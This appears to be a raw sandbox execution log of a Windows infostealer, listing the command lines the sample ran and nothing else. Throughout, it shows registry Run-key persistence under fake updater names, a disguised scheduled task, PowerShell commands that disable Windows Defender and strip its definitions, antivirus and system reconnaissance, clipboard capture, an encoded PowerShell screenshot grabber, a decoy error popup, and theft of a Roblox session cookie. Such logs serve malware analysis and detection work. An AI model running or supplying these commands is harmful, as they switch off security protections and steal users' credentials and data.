C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\210B.tmp\210C.tmp\210D.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Users\Admin\AppData\Local\Temp\825323185.exe
C:\Users\Admin\AppData\Local\Temp\825323185.exe
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\SysWOW64\cmd.exe
cmd /c md 578678
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V "PEACEFOLKSEXUALISLANDS" Hill
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\28CB.tmp\28CC.tmp\28CD.bat C:\Windows\system32\java.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
Cooper.pif y
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3167.tmp\3168.tmp\3169.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ip4payln\ip4payln.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A5F.tmp" "c:\Users\Admin\AppData\Local\Temp\ip4payln\CSCC785AF7DB90494D98D9F667C22783AD.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B2B.tmp\3B2C.tmp\3B2D.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\1710112153.exe
C:\Users\Admin\AppData\Local\Temp\1710112153.exe
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40A9.tmp\40AA.tmp\40AB.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
